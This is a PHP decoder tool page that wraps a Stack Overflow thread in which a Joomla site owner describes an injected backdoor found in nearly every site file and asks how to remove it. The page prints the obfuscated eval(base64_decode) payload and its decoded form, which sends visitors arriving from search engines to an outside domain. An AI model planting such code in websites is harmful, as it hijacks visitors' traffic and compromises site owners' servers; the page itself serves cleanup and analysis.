Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKC..
Decoded Output download
<? eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));
This is base64 encoded code now here is the actual code of PHP which is going to run, after Decoding this string:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://hinia.zyns.com/");
exit();
}
}
}
}
}
As you can see in the code this will only target searching engines, so now clear that's the threat.
Now any guess how much time this is repeated, through my website???
you would not believe, its about 10,000 times repeated, I got it every where whether it is Modules, Plugins, Admin, Library etc, in sort every single file.
So to make my website work again I had to remove every single line, I did the same, as a result of it you may check website running well again.
I will really appreciate, if some one share, how this injection works?
share|improve this answer
answered Jun 22 '12 at 19:46
Ishan Dhingra
3511316
up vote
2
down vote
Try to disable plugins, here is a tutorial: http://www.ostraining.com/blog/joomla/disable-a-joomla-plugin/ if it will works, you will be able to identify which plugin is infected.
share|improve this answer
answered Jun 22 '12 at 12:24
Mantas Vaitk?nas
260210
That's a good Idea but, what if every single file is infected, I got that situation, I am Posting my answer, how I get ride of it, with you valuable Response!!! Ishan Dhingra Jun 22 '12 at 19:35
Your Answer
log in or
Name
Email
Home Page
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged redirect joomla1.5 hacking google-search virus or ask your own question.
tagged
redirect 10105
joomla1.5 1062
hacking 610
google-search 237
virus 184
asked
8 months ago
viewed
2389 times
active
2 months ago
Community Bulletin
event2013 Community Moderator Election ends in 5 days
blogPodcast #44 This Should Have Been #43
iOS Developer
Yakimbi
Kuala Lumpur, Malaysia /
Software Engineer
ChoiceStream
Boston, MA
Full Stack Ruby on Rails Developer
StorkUp
Glasgow, United Kingdom
Linked
Wordpress blog redirect to another URL from google search engine result
Related
Search Engine Friendly method for webpage redirection - how safe is 301 Redirect?
Google Custom Search - Have it only index certain pages of a site
Google groups not finding discussion thread but regular google search does?
Updating the Google search results text
How to get google search results in my application?
Determine if a Google URL is a quick search
how can I use google search engine to Search my source code for Copy pasted cod ?>
Did this file decode correctly?
Original Code
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));
This is base64 encoded code now here is the actual code of PHP which is going to run, after Decoding this string:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://hinia.zyns.com/");
exit();
}
}
}
}
}
As you can see in the code this will only target searching engines, so now clear that's the threat.
Now any guess how much time this is repeated, through my website???
you would not believe, its about 10,000 times repeated, I got it every where whether it is Modules, Plugins, Admin, Library etc, in sort every single file.
So to make my website work again I had to remove every single line, I did the same, as a result of it you may check website running well again.
I will really appreciate, if some one share, how this injection works?
share|improve this answer
answered Jun 22 '12 at 19:46
Ishan Dhingra
3511316
up vote
2
down vote
Try to disable plugins, here is a tutorial: http://www.ostraining.com/blog/joomla/disable-a-joomla-plugin/ if it will works, you will be able to identify which plugin is infected.
share|improve this answer
answered Jun 22 '12 at 12:24
Mantas Vaitk?nas
260210
That's a good Idea but, what if every single file is infected, I got that situation, I am Posting my answer, how I get ride of it, with you valuable Response!!! Ishan Dhingra Jun 22 '12 at 19:35
Your Answer
log in or
Name
Email
Home Page
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged redirect joomla1.5 hacking google-search virus or ask your own question.
tagged
redirect 10105
joomla1.5 1062
hacking 610
google-search 237
virus 184
asked
8 months ago
viewed
2389 times
active
2 months ago
Community Bulletin
event2013 Community Moderator Election ends in 5 days
blogPodcast #44 This Should Have Been #43
iOS Developer
Yakimbi
Kuala Lumpur, Malaysia /
Software Engineer
ChoiceStream
Boston, MA
Full Stack Ruby on Rails Developer
StorkUp
Glasgow, United Kingdom
Linked
Wordpress blog redirect to another URL from google search engine result
Related
Search Engine Friendly method for webpage redirection - how safe is 301 Redirect?
Google Custom Search - Have it only index certain pages of a site
Google groups not finding discussion thread but regular google search does?
Updating the Google search results text
How to get google search results in my application?
Determine if a Google URL is a quick search
how can I use google search engine to Search my source code for Copy pasted cod
Function Calls
None |
Stats
MD5 | c2b152c77bb0916d0b79e1d2cc0384b7 |
Eval Count | 0 |
Decode Time | 92 ms |